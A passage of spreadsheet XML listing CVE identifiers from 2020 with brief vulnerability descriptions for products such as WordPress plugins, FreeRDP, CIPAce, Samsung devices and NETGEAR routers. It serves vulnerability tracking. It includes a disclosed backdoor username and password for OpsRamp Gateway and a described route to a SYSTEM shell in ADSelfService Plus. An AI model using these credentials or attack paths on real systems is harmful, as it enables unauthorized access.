    <t>Slack Nebula through 1.1.0 contains a relative path vulnerability that allows a low-privileged attacker to execute code in the context of the root user via tun_darwin.go or tun_windows.go. A user can also use Nebula to execute arbitrary code in the user's own context, e.g., for user-level persistence or to bypass security controls. NOTE: the vendor states that this "requires a high degree of access and other preconditions that are tough to achieve."</t>
  </si>
  <si>
    <t>CVE-2020-11499</t>
  </si>
  <si>
    <t>Firmware Analysis and Comparison Tool (FACT) 3 has Stored XSS when updating analysis details via a localhost web request, as demonstrated by mishandling of the tags and version fields in helperFunctions/mongo_task_conversion.py.</t>
  </si>
  <si>
    <t>CVE-2020-1150</t>
  </si>
  <si>
    <t>A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka 'Media Foundation Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1028, CVE-2020-1126, CVE-2020-1136.</t>
  </si>
  <si>
    <t>CVE-2020-11500</t>
  </si>
  <si>
    <t>Zoom Client for Meetings through 4.6.9 uses the ECB mode of AES for video and audio encryption. Within a meeting, all participants use a single 128-bit key.</t>
  </si>
  <si>
    <t>CVE-2020-11501</t>
  </si>
  <si>
    <t>GnuTLS 3.6.x before 3.6.13 uses incorrect cryptography for DTLS. The earliest affected version is 3.6.3 (2018-07-16) because of an error in a 2017-10-06 commit. The DTLS client always uses 32 '\0' bytes instead of a random value, and thus contributes no randomness to a DTLS negotiation. This breaks the security guarantees of the DTLS protocol.</t>
  </si>
  <si>
    <t>CVE-2020-11503</t>
  </si>
  <si>
    <t>A heap-based buffer overflow in the awarrensmtp component of Sophos XG Firewall v17.5 MR11 and older potentially allows an attacker to run arbitrary code remotely.</t>
  </si>
  <si>
    <t>CVE-2020-11505</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab Community Edition (CE) and Enterprise Edition (EE) before 12.7.9, 12.8.x before 12.8.9, and 12.9.x before 12.9.3. A Workhorse bypass could lead to NuGet package and file disclosure (Exposure of Sensitive Information) via request smuggling.</t>
  </si>
  <si>
    <t>CVE-2020-11506</t>
  </si>
  <si>
    <t>An issue was discovered in GitLab 10.7.0 and later through 12.9.2. A Workhorse bypass could lead to job artifact uploads and file disclosure (Exposure of Sensitive Information) via request smuggling.</t>
  </si>
  <si>
    <t>CVE-2020-11507</t>
  </si>
  <si>
    <t>An Untrusted Search Path vulnerability in Malwarebytes AdwCleaner 8.0.3 could cause arbitrary code execution with SYSTEM privileges when a malicious DLL library is loaded.</t>
  </si>
  <si>
    <t>CVE-2020-11508</t>
  </si>
  <si>
    <t>An XSS vulnerability in the WP Lead Plus X plugin through 0.98 for WordPress allows logged-in users with minimal permissions to create or replace existing pages with a malicious page containing arbitrary JavaScript via the wp_ajax_core37_lp_save_page (aka core37_lp_save_page) AJAX action.</t>
  </si>
  <si>
    <t>CVE-2020-11509</t>
  </si>
  <si>
    <t>An XSS vulnerability in the WP Lead Plus X plugin through 0.98 for WordPress allows remote attackers to upload page templates containing arbitrary JavaScript via the c37_wpl_import_template admin-post action (which will execute in an administrator's browser if the template is used to create a page).</t>
  </si>
  <si>
    <t>CVE-2020-1151</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11511</t>
  </si>
  <si>
    <t>The LearnPress plugin before 3.2.6.9 for WordPress allows remote attackers to escalate the privileges of any user to LP Instructor via the accept-to-be-teacher action parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11512</t>
  </si>
  <si>
    <t>Stored XSS in the IMPress for IDX Broker WordPress plugin before 2.6.2 allows authenticated attackers with minimal (subscriber-level) permissions to save arbitrary JavaScript in the plugin's settings panel via the idx_update_recaptcha_key AJAX action and a crafted idx_recaptcha_site_key parameter, which would then be executed in the browser of any administrator visiting the panel. This could be used to create new administrator-level accounts.</t>
  </si>
  <si>
    <t>CVE-2020-11514</t>
  </si>
  <si>
    <t>The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to update arbitrary WordPress metadata, including the ability to escalate or revoke administrative privileges for existing users via the unsecured rankmath/v1/updateMeta REST API endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-11515</t>
  </si>
  <si>
    <t>The Rank Math plugin through 1.0.40.2 for WordPress allows unauthenticated remote attackers to create new URIs (that redirect to an external web site) via the unsecured rankmath/v1/updateRedirection REST API endpoint. In other words, this is not an "Open Redirect" issue; instead, it allows the attacker to create a new URI with an arbitrary name (e.g., the /exampleredirect URI).</t>
  </si>
  <si>
    <t>CVE-2020-11516</t>
  </si>
  <si>
    <t>Stored XSS in the Contact Form 7 Datepicker plugin through 2.6.0 for WordPress allows authenticated attackers with minimal permissions to save arbitrary JavaScript to the plugin's settings via the unprotected wp_ajax_cf7dp_save_settings AJAX action and the ui_theme parameter. If an administrator creates or modifies a contact form, the JavaScript will be executed in their browser, which can then be used to create new administrative users or perform other actions using the administrator's session.</t>
  </si>
  <si>
    <t>CVE-2020-11518</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADSelfService Plus before 5815 allows unauthenticated remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11519</t>
  </si>
  <si>
    <t>The SDDisk2k.sys driver of WinMagic SecureDoc v8.5 and earlier allows local users to read or write to physical disc sectors via a \\.\SecureDocDevice handle. Exploiting this vulnerability results in privileged code execution.</t>
  </si>
  <si>
    <t>CVE-2020-1152</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles calls to Win32k.sys, aka 'Windows Win32k Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11520</t>
  </si>
  <si>
    <t>The SDDisk2k.sys driver of WinMagic SecureDoc v8.5 and earlier allows local users to write to arbitrary kernel memory addresses because the IOCTL dispatcher lacks pointer validation. Exploiting this vulnerability results in privileged code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11521</t>
  </si>
  <si>
    <t>libfreerdp/codec/planar.c in FreeRDP version &gt; 1.0 through 2.0.0-rc4 has an Out-of-bounds Write.</t>
  </si>
  <si>
    <t>CVE-2020-11522</t>
  </si>
  <si>
    <t>libfreerdp/gdi/gdi.c in FreeRDP &gt; 1.0 through 2.0.0-rc4 has an Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11523</t>
  </si>
  <si>
    <t>libfreerdp/gdi/region.c in FreeRDP versions &gt; 1.0 through 2.0.0-rc4 has an Integer Overflow.</t>
  </si>
  <si>
    <t>CVE-2020-11524</t>
  </si>
  <si>
    <t>libfreerdp/codec/interleaved.c in FreeRDP versions &gt; 1.0 through 2.0.0-rc4 has an Out-of-bounds Write.</t>
  </si>
  <si>
    <t>CVE-2020-11525</t>
  </si>
  <si>
    <t>libfreerdp/cache/bitmap.c in FreeRDP versions &gt; 1.0 through 2.0.0-rc4 has an Out of bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-11526</t>
  </si>
  <si>
    <t>libfreerdp/core/update.c in FreeRDP versions &gt; 1.1 through 2.0.0-rc4 has an Out-of-bounds Read.</t>
  </si>
  <si>
    <t>CVE-2020-11527</t>
  </si>
  <si>
    <t>In Zoho ManageEngine OpManager before 12.4.181, an unauthenticated remote attacker can send a specially crafted URI to read arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-11528</t>
  </si>
  <si>
    <t>bit2spr 1992-06-07 has a stack-based buffer overflow (129-byte write) in conv_bitmap in bit2spr.c via a long line in a bitmap file.</t>
  </si>
  <si>
    <t>CVE-2020-11529</t>
  </si>
  <si>
    <t>Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x.</t>
  </si>
  <si>
    <t>CVE-2020-1153</t>
  </si>
  <si>
    <t>exploits/php/webapps/48457.txt</t>
  </si>
  <si>
    <t>WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection</t>
  </si>
  <si>
    <t>2020-05-12</t>
  </si>
  <si>
    <t>CVE-2020-11530</t>
  </si>
  <si>
    <t>A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.</t>
  </si>
  <si>
    <t>CVE-2020-11531</t>
  </si>
  <si>
    <t>The DataEngine Xnode Server application in Zoho ManageEngine DataSecurity Plus prior to 6.0.1 does not validate the database schema name when handling a DR-SCHEMA-SYNC request. This allows an authenticated attacker to execute code in the context of the product by writing a JSP file to the webroot directory via directory traversal.</t>
  </si>
  <si>
    <t>CVE-2020-11532</t>
  </si>
  <si>
    <t>Zoho ManageEngine DataSecurity Plus prior to 6.0.1 uses default admin credentials to communicate with a DataEngine Xnode server. This allows an attacker to bypass authentication for this server and execute all operations in the context of admin user.</t>
  </si>
  <si>
    <t>CVE-2020-11533</t>
  </si>
  <si>
    <t>Ivanti Workspace Control before 10.4.30.0, when SCCM integration is enabled, allows local users to obtain sensitive information (keying material).</t>
  </si>
  <si>
    <t>CVE-2020-11534</t>
  </si>
  <si>
    <t>An issue was discovered in ONLYOFFICE Document Server 5.5.0. An attacker can craft a malicious .docx file, and exploit the NSFileDownloader function to pass parameters to a binary (such as curl or wget) and remotely execute code on a victim's server.</t>
  </si>
  <si>
    <t>CVE-2020-11535</t>
  </si>
  <si>
    <t>An issue was discovered in ONLYOFFICE Document Server 5.5.0. An attacker can craft a malicious .docx file, and exploit XML injection to enter an attacker-controlled parameter into the x2t binary, to rewrite this binary and/or libxcb.so.1, and execute code on a victim's server.</t>
  </si>
  <si>
    <t>CVE-2020-11536</t>
  </si>
  <si>
    <t>An issue was discovered in ONLYOFFICE Document Server 5.5.0. An attacker can craft a malicious .docx file, and exploit the unzip function to rewrite a binary and remotely execute code on a victim's server.</t>
  </si>
  <si>
    <t>CVE-2020-11537</t>
  </si>
  <si>
    <t>A SQL Injection issue was discovered in ONLYOFFICE Document Server 5.5.0. An attacker can execute arbitrary SQL queries via injection to DocID parameter of Websocket API.</t>
  </si>
  <si>
    <t>CVE-2020-11538</t>
  </si>
  <si>
    <t>In libImaging/SgiRleDecode.c in Pillow through 7.0.0, a number of out-of-bounds reads exist in the parsing of SGI image files, a different issue than CVE-2020-5311.</t>
  </si>
  <si>
    <t>CVE-2020-11539</t>
  </si>
  <si>
    <t>An issue was discovered on Tata Sonata Smart SF Rush 1.12 devices. It has been identified that the smart band has no pairing (mode 0 Bluetooth LE security level) The data being transmitted over the air is not encrypted. Adding to this, the data being sent to the smart band doesn't have any authentication or signature verification. Thus, any attacker can control a parameter of the device.</t>
  </si>
  <si>
    <t>CVE-2020-1154</t>
  </si>
  <si>
    <t>CVE-2020-11541</t>
  </si>
  <si>
    <t>In TechSmith SnagIt 11.2.1 through 20.0.3, an XML External Entity (XXE) injection issue exists that would allow a local attacker to exfiltrate data under the local Administrator account.</t>
  </si>
  <si>
    <t>CVE-2020-11542</t>
  </si>
  <si>
    <t>3xLOGIC Infinias eIDC32 2.213 devices with Web 1.107 allow Authentication Bypass via CMD.HTM?CMD= because authentication depends on the client side's interpretation of the &lt;KEY&gt;MYKEY&lt;/KEY&gt; substring.</t>
  </si>
  <si>
    <t>CVE-2020-11543</t>
  </si>
  <si>
    <t>OpsRamp Gateway before 7.0.0 has a backdoor account vadmin with the password 9vt@f3Vt that allows root SSH access to the server. This issue has been resolved in OpsRamp Gateway firmware version 7.0.0 where an administrator and a system user accounts are the only available user accounts for the gateway appliance.</t>
  </si>
  <si>
    <t>CVE-2020-11544</t>
  </si>
  <si>
    <t>An issue was discovered in Project Worlds Official Car Rental System 1. It allows the admin user to run commands on the server with their account because the upload section on the file-manager page contains an arbitrary file upload vulnerability via add_cars.php. There are no upload restrictions for executable files.</t>
  </si>
  <si>
    <t>CVE-2020-11545</t>
  </si>
  <si>
    <t>Project Worlds Official Car Rental System 1 is vulnerable to multiple SQL injection issues, as demonstrated by the email and parameters (account.php), uname and pass parameters (login.php), and id parameter (book_car.php) This allows an attacker to dump the MySQL database and to bypass the login authentication prompt.</t>
  </si>
  <si>
    <t>CVE-2020-11546</t>
  </si>
  <si>
    <t>SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.</t>
  </si>
  <si>
    <t>CVE-2020-11547</t>
  </si>
  <si>
    <t>PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm.</t>
  </si>
  <si>
    <t>CVE-2020-11548</t>
  </si>
  <si>
    <t>The Search Meter plugin through 2.13.2 for WordPress allows user input introduced in the search bar to be any formula. The attacker could achieve remote code execution via CSV injection if a wp-admin/index.php?page=search-meter Export is performed.</t>
  </si>
  <si>
    <t>CVE-2020-11549</t>
  </si>
  <si>
    <t>An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The root account has the same password as the Web-admin component. Thus, by exploiting CVE-2020-11551, it is possible to achieve remote code execution with root privileges on the embedded Linux system.</t>
  </si>
  <si>
    <t>CVE-2020-1155</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1156, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11550</t>
  </si>
  <si>
    <t>An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote leak of sensitive/arbitrary Wi-Fi information, such as SSIDs and Pre-Shared-Keys (PSK).</t>
  </si>
  <si>
    <t>CVE-2020-11551</t>
  </si>
  <si>
    <t>An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The administrative SOAP interface allows an unauthenticated remote write of arbitrary Wi-Fi configuration data such as authentication details (e.g., the Web-admin password), network settings, DNS settings, system administration interface configuration, etc.</t>
  </si>
  <si>
    <t>CVE-2020-11552</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in ManageEngine ADSelfService Plus before build 6003 because it does not properly enforce user privileges associated with a Certificate dialog. This vulnerability could allow an unauthenticated attacker to escalate privileges on a Windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. One option is the self-service option on the Windows login screen. Upon selecting this option, the thick-client software is launched, which connects to a remote ADSelfService Plus server to facilitate self-service operations. An unauthenticated attacker having physical access to the host could trigger a security alert by supplying a self-signed SSL certificate to the client. The View Certificate option from the security alert allows an attacker to export a displayed certificate to a file. This can further cascade to a dialog that can open Explorer as SYSTEM. By navigating from Explorer to \windows\system32, cmd.exe can be launched as a SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2020-11553</t>
  </si>
  <si>
    <t>An issue was discovered in Castle Rock SNMPc Online 12.10.10 before 2020-01-28. There is pervasive CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-11554</t>
  </si>
  <si>
    <t>An issue was discovered in Castle Rock SNMPc Online 12.10.10 before 2020-01-28. It allows remote attackers to obtain sensitive information via info.php4.</t>
  </si>
  <si>
    <t>CVE-2020-11555</t>
  </si>
  <si>
    <t>An issue was discovered in Castle Rock SNMPc Online 12.10.10 before 2020-01-28. It allows remote attackers to obtain sensitive credential information from backup files.</t>
  </si>
  <si>
    <t>CVE-2020-11556</t>
  </si>
  <si>
    <t>An issue was discovered in Castle Rock SNMPc Online 12.10.10 before 2020-01-28. There are multiple persistent (stored) and reflected XSS vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-11557</t>
  </si>
  <si>
    <t>An issue was discovered in Castle Rock SNMPc Online 12.10.10 before 2020-01-28. It includes the username and password values in cleartext within each request's cookie value.</t>
  </si>
  <si>
    <t>CVE-2020-11558</t>
  </si>
  <si>
    <t>An issue was discovered in libgpac.a in GPAC 0.8.0, as demonstrated by MP4Box. audio_sample_entry_Read in isomedia/box_code_base.c does not properly decide when to make gf_isom_box_del calls. This leads to various use-after-free outcomes involving mdia_Read, gf_isom_delete_movie, and gf_isom_parse_movie_boxes.</t>
  </si>
  <si>
    <t>CVE-2020-1156</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1157, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11560</t>
  </si>
  <si>
    <t>NCH Express Invoice 7.25 allows local users to discover the cleartext password by reading the configuration file.</t>
  </si>
  <si>
    <t>CVE-2020-11561</t>
  </si>
  <si>
    <t>In NCH Express Invoice 7.25, an authenticated low-privilege user can enter a crafted URL to access higher-privileged functionalities such as the "Add New Item" screen.</t>
  </si>
  <si>
    <t>CVE-2020-11565</t>
  </si>
  <si>
    <t>** DISPUTED ** An issue was discovered in the Linux kernel through 5.6.2. mpol_parse_str in mm/mempolicy.c has a stack-based out-of-bounds write because an empty nodelist is mishandled during mount option parsing, aka CID-aa9f7d5172fa. NOTE: Someone in the security community disagrees that this is a vulnerability because the issue “is a bug in parsing mount options which can only be specified by a privileged user, so triggering the bug does not grant any powers not already held.”.</t>
  </si>
  <si>
    <t>CVE-2020-1157</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1158, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11576</t>
  </si>
  <si>
    <t>Fixed in v1.5.1, Argo version v1.5.0 was vulnerable to a user-enumeration vulnerability which allowed attackers to determine the usernames of valid (non-SSO) accounts because /api/v1/session returned 401 for an existing username and 404 otherwise.</t>
  </si>
  <si>
    <t>CVE-2020-11579</t>
  </si>
  <si>
    <t>An issue was discovered in Chadha PHPKB 9.0 Enterprise Edition. installer/test-connection.php (part of the installation process) allows a remote unauthenticated attacker to disclose local files on hosts running PHP before 7.2.16, or on hosts where the MySQL ALLOW LOCAL DATA INFILE option is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-1158</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1077, CVE-2020-1086, CVE-2020-1090, CVE-2020-1125, CVE-2020-1139, CVE-2020-1149, CVE-2020-1151, CVE-2020-1155, CVE-2020-1156, CVE-2020-1157, CVE-2020-1164.</t>
  </si>
  <si>
    <t>CVE-2020-11580</t>
  </si>
  <si>
    <t>An issue was discovered in Pulse Secure Pulse Connect Secure (PCS) through 2020-04-06. The applet in tncc.jar, executed on macOS, Linux, and Solaris clients when a Host Checker policy is enforced, accepts an arbitrary SSL certificate.</t>
  </si>
  <si>
    <t>CVE-2020-11581</t>
  </si>
  <si>
    <t>An issue was discovered in Pulse Secure Pulse Connect Secure (PCS) through 2020-04-06. The applet in tncc.jar, executed on macOS, Linux, and Solaris clients when a Host Checker policy is enforced, allows a man-in-the-middle attacker to perform OS command injection attacks (against a client) via shell metacharacters to the doCustomRemediateInstructions method, because Runtime.getRuntime().exec() is used.</t>
  </si>
  <si>
    <t>CVE-2020-11582</t>
  </si>
  <si>
    <t>An issue was discovered in Pulse Secure Pulse Connect Secure (PCS) through 2020-04-06. The applet in tncc.jar, executed on macOS, Linux, and Solaris clients when a Host Checker policy is enforced, launches a TCP server that accepts local connections on a random port. This can be reached by local HTTP clients, because up to 25 invalid lines are ignored, and because DNS rebinding can occur. (This server accepts, for example, a setcookie command that might be relevant to CVE-2020-11581 exploitation.)</t>
  </si>
  <si>
    <t>CVE-2020-11583</t>
  </si>
  <si>
    <t>A GET-based XSS reflected vulnerability in Plesk Obsidian 18.0.17 allows remote unauthenticated users to inject arbitrary JavaScript, HTML, or CSS via a GET parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11584</t>
  </si>
  <si>
    <t>A GET-based XSS reflected vulnerability in Plesk Onyx 17.8.11 allows remote unauthenticated users to inject arbitrary JavaScript, HTML, or CSS via a GET parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11585</t>
  </si>
  <si>
    <t>There is an information disclosure issue in DNN (formerly DotNetNuke) 9.5 within the built-in Activity-Feed/Messaging/Userid/ Message Center module. A registered user is able to enumerate any file in the Admin File Manager (other than ones contained in a secure folder) by sending themselves a message with the file attached, e.g., by using an arbitrary small integer value in the fileIds parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11586</t>
  </si>
  <si>
    <t>An XXE issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request that contains malicious XML DTD data.</t>
  </si>
  <si>
    <t>CVE-2020-11587</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request and get the content of ETL Processes running on the server.</t>
  </si>
  <si>
    <t>CVE-2020-11588</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an HTTP GET request to two files that contain customer data and application paths.</t>
  </si>
  <si>
    <t>CVE-2020-11589</t>
  </si>
  <si>
    <t>An Insecure Direct Object Reference issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make a GET request to a certain URL and obtain information that should be provided to authenticated users only.</t>
  </si>
  <si>
    <t>CVE-2020-1159</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the StartTileData.dll handles file creation in protected locations, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1052, CVE-2020-1376.</t>
  </si>
  <si>
    <t>CVE-2020-11590</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an HTTP GET request to HealthPage.aspx and obtain the internal server name.</t>
  </si>
  <si>
    <t>CVE-2020-11591</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request and obtain the full application path along with the customer name.</t>
  </si>
  <si>
    <t>CVE-2020-11592</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request and get the columns of a specific table within the CIP database.</t>
  </si>
  <si>
    <t>CVE-2020-11593</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an HTTP POST request with injected HTML data that is later leveraged to send emails from a customer trusted email address.</t>
  </si>
  <si>
    <t>CVE-2020-11594</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request that causes a stack error to be shown providing the full file path.</t>
  </si>
  <si>
    <t>CVE-2020-11595</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an API request and obtain the upload folder path that includes the hostname in a UNC path.</t>
  </si>
  <si>
    <t>CVE-2020-11596</t>
  </si>
  <si>
    <t>A Directory Traversal issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make HTTP GET requests to a certain URL and obtain information about what files and directories reside on the server.</t>
  </si>
  <si>
    <t>CVE-2020-11597</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. An unauthenticated attacker can make an HTTP POST request and inject SQL statements in the user context of the db owner.</t>
  </si>
  <si>
    <t>CVE-2020-11598</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 9.1 Build 2019092801. Upload.ashx allows remote attackers to execute arbitrary code by uploading and executing an ASHX file.</t>
  </si>
  <si>
    <t>CVE-2020-11599</t>
  </si>
  <si>
    <t>An issue was discovered in CIPPlanner CIPAce 6.80 Build 2016031401. GetDistributedPOP3 allows attackers to obtain the username and password of the SMTP user.</t>
  </si>
  <si>
    <t>CVE-2020-1160</t>
  </si>
  <si>
    <t>CVE-2020-11600</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. There is arbitrary code execution in the Fingerprint Trustlet via a memory overwrite. The Samsung IDs are SVE-2019-16587, SVE-2019-16588, SVE-2019-16589 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11601</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. There is unauthorized access to applications in the Secure Folder via floating icons. The Samsung ID is SVE-2019-16195 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11602</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. Google Assistant leaks clipboard contents on a locked device. The Samsung ID is SVE-2019-16558 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11603</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (incorporating TEEGRIS) software. Type confusion in the MLDAP Trustlet allows arbitrary code execution. The Samsung ID is SVE-2020-16599 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11604</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) (incorporating TEEGRIS) software. There is an Out-of-bounds read in the MLDAP Trustlet. The Samsung ID is SVE-2019-16565 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11605</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. There is sensitive information exposure from dumpstate in NFC logs. The Samsung ID is SVE-2019-16359 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11606</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) software. Information about application preview (in the Secure Folder) leaks on a locked device. The Samsung ID is SVE-2019-16463 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11607</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with P(9.0) and Q(10.0) software. Notification exposure occurs in Lockdown mode because of the Edge Lighting application. The Samsung ID is SVE-2020-16680 (April 2020).</t>
  </si>
  <si>
    <t>CVE-2020-11608</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.6.1. drivers/media/usb/gspca/ov519.c allows NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs when there are zero endpoints, aka CID-998912346c0d.</t>
  </si>
  <si>
    <t>CVE-2020-11609</t>
  </si>
  <si>
    <t>An issue was discovered in the stv06xx subsystem in the Linux kernel before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c mishandle invalid descriptors, as demonstrated by a NULL pointer dereference, aka CID-485b06aadb93.</t>
  </si>
  <si>
    <t>CVE-2020-1161</t>
  </si>
  <si>
    <t>CVE-2020-11610</t>
  </si>
  <si>
    <t>An issue was discovered in xdLocalStorage through 2.0.5. The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the "magical iframe" and receive the messages that the "magical iframe" sends.</t>
  </si>
  <si>
    <t>CVE-2020-11611</t>
  </si>
  <si>
    <t>An issue was discovered in xdLocalStorage through 2.0.5. The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends.</t>
  </si>
  <si>
    <t>CVE-2020-11612</t>
  </si>
  <si>
    <t>The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.</t>
  </si>
  <si>
    <t>CVE-2020-11613</t>
  </si>
  <si>
    <t>Mids' Reborn Hero Designer 2.6.0.7 has an elevation of privilege vulnerability due to default and insecure permissions being set for the installation folder. By default, the Authenticated Users group has Modify permissions to the installation folder. Because of this, any user on the system can replace binaries or plant malicious DLLs to obtain elevated, or different, privileges, depending on the context of the user that runs the application.</t>
  </si>
  <si>
    <t>CVE-2020-11614</t>
  </si>
  <si>
